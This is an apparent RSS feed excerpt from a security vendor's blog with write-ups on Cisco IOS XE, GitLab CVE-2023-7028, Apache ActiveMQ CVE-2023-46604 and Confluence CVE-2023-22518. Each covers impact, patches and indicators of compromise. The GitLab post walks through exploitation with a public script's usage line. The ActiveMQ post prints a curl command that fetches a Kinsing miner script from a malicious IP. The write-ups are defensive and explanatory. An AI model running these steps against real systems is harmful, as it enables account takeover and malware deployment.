&lt;li>154.53.56[.]231&lt;/li>
&lt;li>154.53.63[.]93&lt;/li>
&lt;/ul>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>CVE-2023-20198 and CVE-2023-20273 have shown how impactful zero-day attacks are. It became once again evident how important attack surface reduction is. A lot of devices could have been protected from this attack by disabling the HTTP/HTTPS feature. In cases where this is not possible, it would have been best practice to limit access to the WebUI feature only to trusted networks.&lt;/p>
&lt;p>Further, these vulnerabilities pointed out the importance of input validation. Interestingly, Cisco’s approach to fixing this vulnerability is not to fix the path parsing vulnerability. Instead, a new header was added to enforce authentication. This leads to the suspicion that there are other hidden endpoints that can be reached with this method. Only time will prove if that really is the case. In the meantime, it is best to constantly monitor your network and your devices while applying cybersecurity best practices, such as ensuring authentication or attack surface reduction.&lt;/p>
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z" target="_blank" rel="noopener"
>Cisco Security Advisory&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.bleepingcomputer.com/news/security/exploit-released-for-critical-cisco-ios-xe-flaw-many-hosts-still-hacked/#:~:text=Public%20exploit%20code%20is%20now,be%20compromised%2C" target="_blank" rel="noopener"
>Bleeping Computer&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.horizon3.ai/cisco-ios-xe-cve-2023-20198-deep-dive-and-poc/" target="_blank" rel="noopener"
>HORIZON3 Deep Dive and PoC&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.horizon3.ai/attack-research/attack-blogs/cisco-ios-xe-web-ui-vulnerability-a-glimpse-into-cve-2023-20198/" target="_blank" rel="noopener"
>HORIZON3 Attack Blog&lt;/a>&lt;/li>
&lt;/ul></description></item><item><title>CVE-2023-7028 Gitlab Account-Take-Over Vulnerability</title><link>https://blog.senthorus.ch/posts/cve_2023_7028/</link><pubDate>Thu, 25 Jan 2024 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2023_7028/</guid><description>&lt;img src="https://blog.senthorus.ch/cve_2023_7028/CVE_2023_7028_0.png" alt="Featured image of post CVE-2023-7028 Gitlab Account-Take-Over Vulnerability" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>On January 11th, 2024, GitLab published an advisory for several vulnerabilities found in the products GitLab Community Edition and GitLab Enterprise Edition. Of particular interest is a critical vulnerability identified as CVE-2023-7028. This vulnerability allows remote, unauthenticated third parties to takeover any GitLab account by resetting the associated password with an unauthorized email address. A complete takeover of the compromised account is possible as long as no Multi Factor Authentication (MFA) is in place.&lt;/p>
&lt;p>The simplicity of exploitation as well as the potential impact on an organization made CVE-2023-7028 receive a CVSS rating of 10, rating it as &amp;lsquo;critical&amp;rsquo;. The vulnerability was dutifully found and reported through GitLab&amp;rsquo;s bug bounty program by the user &amp;lsquo;asterion04&amp;rsquo; (&lt;a class="link" href="https://hackerone.com/reports/2293343" target="_blank" rel="noopener"
>initial report&lt;/a>).&lt;/p>
&lt;h2 id="presenting-cve-2023-7028">Presenting CVE-2023-7028
&lt;/h2>&lt;p>GitLab is a platform that allows easy management of source code repositories, facilitating collaboration amongst developers. It is widely used for version control and project management, maximizing the throughput of software development teams. As so many other web-based platforms with a large user base, GitLab provides users who forgot their password with a password reset option where the user receives an email with a link to reset the password.&lt;/p>
&lt;p>The password reset request contains an array that accepts the user&amp;rsquo;s email address as input, after which the GitLab instance sends a password reset link to the user&amp;rsquo;s email address. However, and this is where the vulnerability lies, the platform fails to properly check the user&amp;rsquo;s input on the server side and sends the password reset link to any subsequent email address that is listed after the legitimate user&amp;rsquo;s email address. So, by appending his email address to the victim&amp;rsquo;s email, the attacker is able to receive the password reset email, just like the victim.&lt;/p>
&lt;p>Ultimately, the attacker only requires the correct value for the &amp;lsquo;authenticity_token&amp;rsquo; field, as well as the victim&amp;rsquo;s email address, to succeed with the attack.&lt;/p>
&lt;p>While the password reset is possible throughout all affected versions, the account takeover won&amp;rsquo;t work for entities that have MFA enabled.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2023_7028/CVE_2023_7028_1.png"
loading="lazy"
alt="Vulnerability POST /users/password"
>&lt;/p>
&lt;p>&lt;em>Figure 1 Vulnerability POST /users/password (Source: &lt;a class="link" href="https://tryhackme.com/room/gitlabcve20237028" target="_blank" rel="noopener"
>TryHackMe&lt;/a>)&lt;/em>&lt;/p>
&lt;h2 id="affected-versions">Affected versions
&lt;/h2>&lt;p>The following versions of GitLab are affected by CVE-2023-7028:&lt;/p>
&lt;ul>
&lt;li>16.1 to 16.1.5&lt;/li>
&lt;li>16.2 to 16.2.8&lt;/li>
&lt;li>16.3 to 16.3.6&lt;/li>
&lt;li>16.4 to 16.4.4&lt;/li>
&lt;li>16.5 to 16.5.5&lt;/li>
&lt;li>16.6 to 16.6.3&lt;/li>
&lt;li>16.7 to 16.7.1&lt;/li>
&lt;/ul>
&lt;p>Within these versions, all authentication mechanisms are impacted (&lt;a class="link" href="https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/" target="_blank" rel="noopener"
>GitLab security advisory&lt;/a>).&lt;/p>
&lt;h2 id="cve-2023-7028-step-by-step-exploitation">CVE-2023-7028 step-by-step exploitation
&lt;/h2>&lt;p>Let&amp;rsquo;s take a look at a practical example on how to exploit CVE-2023-7028. This step-by-step guide can be found on the cybersecurity training platform TryHackMe in this &lt;a class="link" href="https://tryhackme.com/room/gitlabcve20237028" target="_blank" rel="noopener"
>dedicated room&lt;/a>, which allows for a hands-on experience in a safe environment.&lt;/p>
&lt;h3 id="step-1-preparation">Step 1: Preparation
&lt;/h3>&lt;p>The exploit is only successful when the attacker has knowledge of the victim&amp;rsquo;s email associated with his GitLab account. So, as a first step, it is essential to obtain the correct email address for the victim.&lt;/p>
&lt;h3 id="step-2-prepare-the-exploit-code">Step 2: Prepare the exploit code
&lt;/h3>&lt;p>The GitHub user Vozec published an out-of-the-box working Proof-of-Concept exploit code for CVE-2023-7028, massively simplifying the steps an adversary has to take.&lt;/p>
&lt;p>So, in a second step, the attacker will need to create a local copy of the exploit code.&lt;/p>
&lt;h3 id="step-3-execute-the-exploit-script">Step 3: Execute the exploit script
&lt;/h3>&lt;p>Next, the attacker proceeds to execute the exploit script. The usage for the script is as follows:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>python3 attack.py -u &amp;lt;URL to the vulnerable GitLab instance&amp;gt; -t &amp;lt;victim@mail.com&amp;gt; -e &amp;lt;attacker@mail.com&amp;gt;
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2023_7028/CVE_2023_7028_2.png"
loading="lazy"
alt="Successful exploitation of CVE-2023-7028 with the provided exploit code"
>&lt;/p>
&lt;p>&lt;em>Figure 2 Successful exploitation of CVE-2023-7028 with the provided exploit code (Source: &lt;a class="link" href="https://tryhackme.com/room/gitlabcve20237028" target="_blank" rel="noopener"
>TryHackMe&lt;/a>)&lt;/em>&lt;/p>
&lt;h3 id="step-4-reset-the-password-for-the-victim">Step 4: Reset the password for the victim
&lt;/h3>&lt;p>Upon successful exploitation, the attacker as well as the victim will receive an email prompting them to reset the password.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2023_7028/CVE_2023_7028_3.png"
loading="lazy"
alt="Password reset email sent to the attacker and the victim"
>&lt;/p>
&lt;p>&lt;em>Figure 3 Password reset email sent to the attacker and the victim (Source: TryHackMe)&lt;/em>&lt;/p>
&lt;h3 id="step-5-further-actions-on-the-victim">Step 5: Further actions on the victim
&lt;/h3>&lt;p>Once the attacker gained initial access, he can now start to take further actions on the victim&amp;rsquo;s GitLab instance. Here, the possibilities are almost endless. For instance, the attacker could introduce malicious code into existing projects, exfiltrate confidential information as well as user credentials, or even delete valuable data. Furthermore, the compromised account could be leveraged for further attacks against other users or systems.&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;p>The wide-ranging deployment of GitLab in combination with the public availability of an out-of-the-box working exploit code could have made this vulnerability highly impactful. Fortunately, most of the damage was prevented since the vulnerability was dutifully reported through the HackerOne bug bounty program. Thanks to this report, a patch could be developed before attackers gained knowledge of the vulnerability&amp;rsquo;s existence. GitLab stated in their security advisory that they could not find any successful exploitation on GitLab-managed instances, including gitlab.com. Self-hosted customers should review their logs, checking for possible exploitation attempts (&lt;a class="link" href="https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/" target="_blank" rel="noopener"
>GitLab advisory&lt;/a>).&lt;/p>
&lt;p>A quick search (8th of February, 2024) on &lt;a class="link" href="https://shodan.io/" target="_blank" rel="noopener"
>shodan.io&lt;/a> shows that worldwide, more than 43,000 instances of GitLab are publicly accessible (see Figure 4). However, it is not known how many of these instances are still unpatched.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/cve_2023_7028/CVE_2023_7028_4.png"
loading="lazy"
alt="GitLab instances worldwide"
>&lt;/p>
&lt;p>&lt;em>Figure 4 GitLab instances worldwide. Query: &amp;lsquo;product:GitLab&amp;rsquo; (Source: Senthorus)&lt;/em>&lt;/p>
&lt;p>Currently, there are 319 publicly accessible GitLab instances in Switzerland, ranking Switzerland within the top 20 on the list of most GitLab instances per country.&lt;/p>
&lt;h2 id="defending-against-cve-2023-7028">Defending against CVE-2023-7028?
&lt;/h2>&lt;p>It is highly recommended to patch any self-managed, vulnerable version of GitLab Community Edition or Enterprise Edition to any of the following versions or higher: 16.1.6, 16.2.9, 16.3.7, 16.4.5, 16.5.6, 16.6.4, and 16.7.2. Organizations that have their instances managed by the vendor itself have no need to take any immediate action as the GitLab-managed version is already running on the latest patch.&lt;/p>
&lt;p>Further, organizations that do not have the MFA requirement set up are urged to implement this extra layer of defense since it has proven itself to be a valuable layer of defense.&lt;/p>
&lt;p>To ensure immediate notification every time a patch is released, organizations can enable GitLab security alerts, allowing for early awareness.&lt;/p>
&lt;h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IOCs)
&lt;/h2>&lt;p>Organizations that suspect a possible compromise:&lt;/p>
&lt;ul>
&lt;li>Check the web logs for API calls to &amp;lsquo;/users/password&amp;rsquo; with multiple email addresses.&lt;/li>
&lt;li>Inspect email server logs for messages from GitLab with unexpected recipients (possible attacker-controlled emails).&lt;/li>
&lt;li>Examine GitLab audit logs for entries containing &amp;lsquo;meta.caller.id&amp;rsquo; as &amp;lsquo;PasswordsController#create&amp;rsquo;.&lt;/li>
&lt;/ul>
&lt;h2 id="how-senthorus-protects-its-customers">How Senthorus protects its customers
&lt;/h2>&lt;p>Most cybersecurity experts work in a 9-to-5 environment. Well, the bad news is that threat actors don&amp;rsquo;t. Critical vulnerabilities like CVE-2023-7028 can arise at any time, and not only during business hours. This is where Senthorus jumps in the breach, taking the lead in providing its customers with cyber defense made in Switzerland through full 24/7 monitoring of their infrastructure. On top of this, Senthorus&amp;rsquo; registered customers benefit from Incident Response and Digital Forensics services, in direct collaboration with our analysts, available all year around, 24/7/365.&lt;/p>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>As shown in this article, CVE-2023-7028 could have had a big impact on many organizations worldwide. Mainly because an out-of-the-box working exploit code was shortly after released to the public, but also because the exploit does not require anything else but an email address associated with a GitLab account.&lt;/p>
&lt;p>CVE-2023-7028 is a textbook example of why running a bug bounty program can strengthen security in a reactive way. Through the dutiful report and the immediate actions taken by the vendor, a patch could be developed and provided before any adversarial groups even knew of the existence of said vulnerability.&lt;/p>
&lt;p>CVE-2023-7028 is a strong reminder of the dynamic nature of cybersecurity as well as the importance of the concept &amp;lsquo;Defense in Depth&amp;rsquo;. The simple implementation of MFA for an account protected it against its takeover, massively reducing the impact an attacker could have had on the compromised organization.&lt;/p>
&lt;p>Lastly, we showed how Senthorus can help organizations level up their cyber defense capabilities through extensive 24/7 monitoring and incident response, helping them to always stay ahead in the ever-evolving world of cybersecurity threats.&lt;/p>
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://hackerone.com/reports/2293343" target="_blank" rel="noopener"
>HackerOne report&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/" target="_blank" rel="noopener"
>GitLab security advisory&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-205245-1032.html" target="_blank" rel="noopener"
>BSI Cybersecurity Warning&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://tryhackme.com/room/gitlabcve20237028" target="_blank" rel="noopener"
>TryHackMe room&lt;/a>&lt;/li>
&lt;/ul></description></item><item><title>CVE-2023-46604: Critical RCE in Apache ActiveMQ Exploited by Kinsing Malware</title><link>https://blog.senthorus.ch/posts/cve_2023_46604/</link><pubDate>Wed, 24 Jan 2024 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2023_46604/</guid><description>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_0.png" alt="Featured image of post CVE-2023-46604: Critical RCE in Apache ActiveMQ Exploited by Kinsing Malware" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>On October 27th, 2023, a vulnerability in the Apache ActiveMQ Message Broker, more specifically in the OpenWire Module, was disclosed. The vulnerability identified as CVE-2023-46604 received a CVSS score of 9.8, rating it as ‘critical’.&lt;/p>
&lt;p>Taking a look at the vulnerability, a failed validation of throwable (java) class types leads to the possibility of Remote Code Execution (RCE). For instance, remote, unauthorized actors with access to a vulnerable instance of an OpenWire message broker can leverage the vulnerability to execute any kind of malicious command on the victim machine.&lt;/p>
&lt;p>Please note, through the possibility of remote code execution, threat actors leveraged the vulnerability to deploy a vast amount of different malware including: GoTitan, PrCtrl RAT, Sliver, Ddostff as stated by &lt;a class="link" href="https://www.hackread.com/activemq-flaw-spread-gotitan-botnet-prctrl-rat/" target="_blank" rel="noopener"
>Hackread’s report&lt;/a>. However, in this article, we will analyze exploitation of CVE-2023-46604 in context with the deployment of ‘Kinsing’ a well-known crypto miner targeting Linux systems, also known as ‘h2miner’.&lt;/p>
&lt;h2 id="introducing-message-oriented-middleware-mom">Introducing Message-oriented-Middleware (MoM)
&lt;/h2>&lt;p>Message-oriented-Middleware such as Apache ActiveMQ serves as a crucial bridge between multiple components that can be hosted on separate servers or that were written in different programming languages.&lt;/p>
&lt;p>In general, message brokers are used to ensure reliable, asynchronous communication at all times. Hence, they are mainly found in enterprise systems where on-time delivery of messages is crucial. For example, if it is essential for a system to send a message no matter if the recipient is able to receive it or not (e.g., due to connectivity issues), a Message-oriented-Middleware like Apache ActiveMQ ensures asynchronous message delivery for various protocols, efficiently managing message complexities within distributed systems.&lt;/p>
&lt;h2 id="presenting-cve-2023-46604">Presenting CVE-2023-46604
&lt;/h2>&lt;p>The manufacturer describes the vulnerability as follows:&lt;/p>
&lt;p>“The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or -client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the class path.” (&lt;a class="link" href="https://activemq.apache.org/news/cve-2023-46604" target="_blank" rel="noopener"
>Source: Apache ActiveMQ&lt;/a>)&lt;/p>
&lt;p>In theory, a marshaller is a tool to transform the memory representation of an object into a data format suitable for storage or transmission. It is most commonly used when data must be moved between different computer programs.&lt;/p>
&lt;p>Taking a look at the PatchDiff in the OpenWire protocol marshaller in Figure 1, we can observe that when the marshaller fails to validate the class type of a Throwable – an object dedicated to errors and exceptions in Java – it can accidentally create and execute instances of any class (in Figure 1 on the left half; see line 232). This may lead to the possible execution of remote code.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_1.png"
loading="lazy"
alt="PatchDiff with the red box showing the provided fix"
>&lt;/p>
&lt;p>Figure 1: PatchDiff with the red box showing the provided fix. (Source: &lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html" target="_blank" rel="noopener"
>Trendmicro&lt;/a>)&lt;/p>
&lt;h2 id="use-case-how-is-cve-2023-46604-used-to-deploy-the-kinsing-crypto-miner-malware">Use case: How is CVE-2023-46604 used to deploy the ‘Kinsing’ Crypto Miner malware?
&lt;/h2>&lt;p>Before we dive into how the Apache ActiveMQ vulnerability is used to deploy Kinsing malware along with presenting interesting characteristics of the Crypto Miner, it’s important to mention that threat actors leverage this vulnerability not only to deploy Crypto Miners, but a vast number of different malware could be observed for the attacks, such as ransomware, rootkits, and trojans, just to name a few.&lt;/p>
&lt;h3 id="step-1-initial-access-through-cve-2023-46604">Step 1: Initial access through CVE-2023-46604
&lt;/h3>&lt;p>To gain initial access, attackers exploit the incorrect deserialization vulnerability in the OpenWire protocol, denoted as CVE-2023-46604. Note, this article won’t provide you with a full, in-depth explanation on how to exploit the vulnerability, as this would be out of the scope. So, if you want to take a deep dive into Java (classes), please refer to this &lt;a class="link" href="https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/" target="_blank" rel="noopener"
>technical analysis&lt;/a>. A &lt;a class="link" href="https://github.com/evkl1d/CVE-2023-46604/tree/main" target="_blank" rel="noopener"
>Proof-of-Concept exploit code&lt;/a> can be found here.&lt;/p>
&lt;h3 id="step-2-bash-command">Step 2: Bash command
&lt;/h3>&lt;p>When CVE-2023-46604 is successfully exploited, the attacker is able to remotely execute the following malicious bash command:&lt;/p>
&lt;div class="highlight">&lt;pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">&lt;code class="language-bash" data-lang="bash">&lt;span style="display:flex;">&lt;span>curl -s 194.38.22.53/abc.sh
&lt;/span>&lt;/span>&lt;/code>&lt;/pre>&lt;/div>&lt;p>We can note that the bash command downloads a shell script named ‘abc.sh’ from the known malicious IP ‘194.38.22.53’.&lt;/p>
&lt;h3 id="step-3-execute-downloaded-shell-script">Step 3: Execute downloaded shell script
&lt;/h3>&lt;p>Upon execution, the script ‘abc.sh’ then proceeds to download the Kinsing malware as well as additional binaries that are needed for the successful execution of the cryptocurrency miner. Unlike with other campaigns, the attackers appear to be using just one C2 server.&lt;/p>
&lt;h3 id="step-4-check-for-other-crypto-miners-on-the-victim-machine">Step 4: Check for other crypto miners on the victim machine
&lt;/h3>&lt;p>An interesting feature of the Kensing Malware is that it actively checks if other crypto miners are already active on the compromised host. In the event that other miners were detected, Kensing automatically kills their running processes and active network connections.&lt;/p>
&lt;h3 id="step-5-create-a-cronjob">Step 5: Create a Cronjob
&lt;/h3>&lt;p>Finally, Kensing proceeds to add a cronjob to download and execute its malicious bootstrap script every minute. This way, Kensing ensures that the latest binary of the malware is persistent on the system.&lt;/p>
&lt;h2 id="impact">Impact
&lt;/h2>&lt;p>Apache ActiveMQ is one of the most popular open-source, multi-protocol message brokers based on Java, with more than 100k+ deployments worldwide. However, we have to note that not all instances of Apache ActiveMQ are vulnerable, attackers can only exploit instances that are publicly reachable through the internet and where the OpenWire protocol and thus the vulnerable marshaller are in use.&lt;/p>
&lt;p>A report from the 30th of October 2023, three days after the disclosure of CVE-2023-46604, stated that out of the 7,249 publicly available ActiveMQ instances using the OpenWire protocol, 3,329 were actually vulnerable (&lt;a class="link" href="https://www.shadowserver.org/what-we-do/network-reporting/accessible-activemq-service-report/" target="_blank" rel="noopener"
>Source: Shadowserver&lt;/a>).&lt;/p>
&lt;p>Comparing the worldwide trend with the trend for Switzerland, we can observe that while publicly available Apache ActiveMQ instances using the OpenWire protocol in Switzerland have decreased, the worldwide number of publicly reachable instances has remained the same.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_2.png"
loading="lazy"
alt="Apache Active MQ devices using OpenWire. Coverage: worldwide"
>&lt;/p>
&lt;p>Figure 2 Apache Active MQ devices using OpenWire. Coverage: worldwide (&lt;a class="link" href="https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&amp;amp;d1=2023-10-30&amp;amp;d2=2024-01-24&amp;amp;source=activemq&amp;amp;tag=cve-2023-46604&amp;amp;group_by=geo&amp;amp;style=stacked" target="_blank" rel="noopener"
>Source: Shadowserver&lt;/a>)&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_3.png"
loading="lazy"
alt="Apache Active MQ devices using OpenWire. Coverage: Switzerland"
>&lt;/p>
&lt;p>Figure 3 Apache Active MQ devices using OpenWire. Coverage: Switzerland (&lt;a class="link" href="https://dashboard.shadowserver.org/statistics/combined/time-series/?date_range=other&amp;amp;d1=2023-10-30&amp;amp;d2=2024-01-24&amp;amp;source=activemq&amp;amp;tag=cve-2023-46604&amp;amp;geo=CH&amp;amp;group_by=geo&amp;amp;style=stacked" target="_blank" rel="noopener"
>Source: Shadowserver&lt;/a>)&lt;/p>
&lt;h2 id="attack-trends">Attack trends
&lt;/h2>&lt;p>Taking a look at recent attacks, we observe ongoing exploitation of CVE-2023-46604 to this date (date: 23/01/2024) with spikes on the 28th of December 2023 with a total of 127 unique IPs observed and on the 15th of January 2024 with a total of 108 unique IPs observed exploiting CVE-2023-46604.&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_4.png"
loading="lazy"
alt="Attack Timeline over the last 30 days"
>&lt;/p>
&lt;p>Figure 4 Attack Timeline over the last 30 days (&lt;a class="link" href="https://viz.greynoise.io/tag/apache-activemq-rce-attempt?days=30" target="_blank" rel="noopener"
>Source: Greynoise&lt;/a>, Date: 23/01/2024)&lt;/p>
&lt;h2 id="defending-against-cve-2023-46604">Defending against CVE-2023-46604?
&lt;/h2>&lt;p>According to &lt;a class="link" href="https://activemq.apache.org/security-advisories.data/CVE-2023-46604" target="_blank" rel="noopener"
>Apache’s advisory&lt;/a>, CVE-2023-46604 affects the following versions of Apache ActiveMQ:&lt;/p>
&lt;ul>
&lt;li>Apache ActiveMQ 5.18.0 before 5.18.3&lt;/li>
&lt;li>Apache ActiveMQ 5.17.0 before 5.17.6&lt;/li>
&lt;li>Apache ActiveMQ 5.16.0 before 5.16.7&lt;/li>
&lt;li>Apache ActiveMQ before 5.15.16&lt;/li>
&lt;li>Apache ActiveMQ Legacy OpenWire Module 5.18.0 before 5.18.3&lt;/li>
&lt;li>Apache ActiveMQ Legacy OpenWire Module 5.17.0 before 5.17.6&lt;/li>
&lt;li>Apache ActiveMQ Legacy OpenWire Module 5.16.0 before 5.16.7&lt;/li>
&lt;li>Apache ActiveMQ Legacy OpenWire Module 5.8.0 before 5.15.16&lt;/li>
&lt;/ul>
&lt;p>With a technical analysis as well as a proof-of-concept exploit code publicly accessible, organizations should update to a fixed version of ActiveMQ as soon as possible. The following versions implement the provided patch: 5.15.16, 5.16.7, 5.17.6, or 5.18.3. Further, it is strongly recommended to sift through the logs, searching for Indicators of Compromise (IoC). Logs are stored in the activemq.log&lt;/p>
&lt;p>System administrators can find the distributed updates &lt;a class="link" href="https://activemq.apache.org/components/classic/download/" target="_blank" rel="noopener"
>here&lt;/a>. Apache also actively maintains a section &lt;a class="link" href="https://activemq.apache.org/security-advisories.data/CVE-2023-46604" target="_blank" rel="noopener"
>here&lt;/a> on how to improve the security posture of ActiveMQ implementations.&lt;/p>
&lt;h2 id="indicators-of-compromise-iocs">Indicators of Compromise (IOCs)
&lt;/h2>&lt;p>As several threat actors leverage CVE-2023-46604 to distribute different kinds of malware, there are a lot of IoCs to be observed. Taking a look at exploitation attempts leveraging the Kinsing crypto miner, the following IoCs could be observed:&lt;/p>
&lt;ul>
&lt;li>IPv4: 194.38.22[.]53&lt;/li>
&lt;li>URL: hxxp://194.38.22[.]53/abc.sh&lt;/li>
&lt;li>File hash SHA-256: 5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d&lt;/li>
&lt;li>File hash SHA-256: e61f1337ffd14b9538ea102388f7bca234c3e719392bc1e03733e36913053a13&lt;/li>
&lt;/ul>
&lt;p>Please note that this list only includes IoCs for the deployment of Kinsing malware. If you want a more extensive list, covering other types of malware, this &lt;a class="link" href="https://socradar.io/critical-rce-vulnerability-in-apache-activemq-is-targeted-by-hellokitty-ransomware-cve-2023-46604/" target="_blank" rel="noopener"
>article&lt;/a> is a good place to start.&lt;/p>
&lt;h2 id="how-senthorus-protects-its-customers">How Senthorus protects its customers
&lt;/h2>&lt;p>Most cybersecurity experts work in a 9-to-5 environment. Well, the bad news is that threat actors don’t. Critical vulnerabilities like CVE-2023-46604 can arise at any time, and not only during business hours. This is where Senthorus jumps in the breach, taking the lead in providing its customers with cyber defense made in Switzerland through full 24/7 monitoring of their infrastructure. On top of this Senthorus’ registered customers benefit from Incident Response and Digital Forensics services, in direct collaboration with our analysts, available all year around, 24/7/365.&lt;/p>
&lt;p>Taking a look at CVE-2023-46604, Microsoft Defender for Endpoint quickly included the ActiveMQ vulnerability in their detection:&lt;/p>
&lt;p>&lt;img src="https://blog.senthorus.ch/CVE_2023_46604_5.jpg"
loading="lazy"
alt="Microsoft Defender for Endpoint Detection for CVE-2023-46604"
>&lt;/p>
&lt;p>Figure 5 Microsoft Defender for Endpoint Detection for CVE-2023-46604&lt;/p>
&lt;h2 id="summary">Summary
&lt;/h2>&lt;p>CVE-2023-46604 was exploited by threat actors to remotely execute arbitrary code on the victim machines. This led to the deployment of ransomware, crypto miners, and trojans, just to mention a few. In this article, we analyzed what exactly causes the improper deserialization in the OpenWire protocol marshaller and what the corresponding consequences are. Even though disclosure of CVE-2023-46604 occurred more than two months ago, the vulnerability is still ongoingly being exploited. Due to the simplicity of the attack preparation as well as the exploitation phase, CVE-2023-46604 received a CVSS rating of ‘critical’. Affected organizations are urged to patch to secure versions as soon as possible.&lt;/p>
&lt;p>CVE-2023-46604 is a strong reminder of the dynamic nature of cybersecurity as well as the complex characteristics of digital supply chain. We showed how Senthorus can help organizations level up their cyber defense capabilities through extensive 24/7 monitoring and incident response.&lt;/p>
&lt;h2 id="references">References
&lt;/h2>&lt;ul>
&lt;li>&lt;a class="link" href="https://phoenix.security/vuln-apache-activemq-cve-2023-46604/" target="_blank" rel="noopener"
>Phoenix Security&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cve-2023-46604-exploited-by-kinsing.html" target="_blank" rel="noopener"
>Trendmicro&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://www.huntress.com/blog/critical-vulnerability-exploitation-of-apache-activemq-cve-2023-46604" target="_blank" rel="noopener"
>Huntress&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://viz.greynoise.io/tag/apache-activemq-rce-attempt?days=30" target="_blank" rel="noopener"
>Greynoise&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://socradar.io/critical-rce-vulnerability-in-apache-activemq-is-targeted-by-hellokitty-ransomware-cve-2023-46604/" target="_blank" rel="noopener"
>SOCRadar&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://activemq.apache.org/security" target="_blank" rel="noopener"
>Apache Security&lt;/a>&lt;/li>
&lt;li>&lt;a class="link" href="https://exp10it.io/2023/10/apache-activemq-%E7%89%88%E6%9C%AC-5.18.3-rce-%E5%88%86%E6%9E%90/" target="_blank" rel="noopener"
>Exp10it Technical Analysis&lt;/a>&lt;/li>
&lt;/ul></description></item><item><title>CVE-2023-22518 and how it is used in recent Ransomware Attacks</title><link>https://blog.senthorus.ch/posts/cve_2023_22518/</link><pubDate>Tue, 31 Oct 2023 00:00:00 +0000</pubDate><guid>https://blog.senthorus.ch/posts/cve_2023_22518/</guid><description>&lt;img src="https://blog.senthorus.ch/CVE_2023_22518_0.png" alt="Featured image of post CVE-2023-22518 and how it is used in recent Ransomware Attacks" />&lt;h2 id="introduction">Introduction
&lt;/h2>&lt;p>On October 31st, 2023, Atlassian published a security bulletin presenting an Improper Authorization vulnerability. It affects all versions of Confluence Data Center and Confluence Server that are not hosted by Atlassian. Successful exploitation of this vulnerability allows a remote, unauthenticated attacker to create administrator accounts. Further, the attacker is able to reset the Confluence instance completely, affecting the Availability of the data, as there is no other way to retrieve the lost data apart from a backup.&lt;/p>
&lt;p>The vulnerability tracked as &lt;a class="link" href="https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html" target="_blank" rel="noopener"
>CVE-2023-22518&lt;/a> initially received a CVSS score of 9.1. However, on November 6th, 2023, Atlassian updated the score to 10.0, ranking it as ‘critical’ since the vulnerability was leveraged by threat actors to deploy the ‘C3RB3R’ Ransomware (for further information, see this &lt;a class="link" href="https://www.trendmicro.com/en_us/research/23/k/cerber-ransomware-exploits-cve-2023-22518.html" target="_blank" rel="noopener"
>article from Trendmicro&lt;/a>).&lt;/p>
&lt;h2 id="presenting-cve-2023-22518">Presenting CVE-2023-22518
&lt;/h2>&lt;p>The root cause of CVE-2023-22518 is a rights control fault in the ‘WebSudo’ module used in the affected Atlassian products. Any remote, unauthenticated attacker can send specific web requests to take control of the Confluence instance. Note: Instances hosted by Atlassian, accessed via an atlassian.net domain, are not vulnerable.&lt;/p>
